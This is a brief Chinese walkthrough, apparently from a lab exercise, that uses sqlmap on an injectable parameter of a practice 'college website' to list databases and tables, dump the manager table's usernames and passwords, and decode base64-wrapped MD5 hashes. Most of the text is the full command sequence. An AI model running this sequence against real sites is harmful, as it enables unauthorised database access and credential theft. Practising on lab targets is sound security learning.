sqlmap实战,获取学院网站(靶机)管理员密码
首先获取学院网址,寻找注入点,利用上节学到的sqlmap使用方法
然后直接放进sqlmap里运行,输入sqlmap.py -u http://117.167.136.244:28004/index/narticle.php?nid=3027
如下图
接着找出所有数据库,输入sqlmap.py -u http://117.167.136.244:28004/index/narticle.php?nid=3027 --dbs
运行结果如下
接着选择rjxy数据库,找出所有的表,输入sqlmap.py -u http://117.167.136.244:28004/index/narticle.php?nid=3027 -D rjxy --tables
运行结果如下
要寻找管理员密码,所以选择manager表,找出里面所有字段
输入sqlmap.py -u http://117.167.136.244:28004/index/narticle.php?nid=3027 -D rjxy -T manager --columns
结果如下
出现passw字段,说明选择正确,然后找出用户名和密码
输入sqlmap.py -u http://117.167.136.244:28004/index/narticle.php?nid=3027 -D rjxy -T manager -C password,username --dump
结果如下
密码找出来了,但是发现是加密过的密码。
观察发现是base64加密过后的密码,反过来利用base64解码即可
解密后得到一串数字,观察得知是MD5加密,用soMD5解密即可
所以得出学院密码和用户名。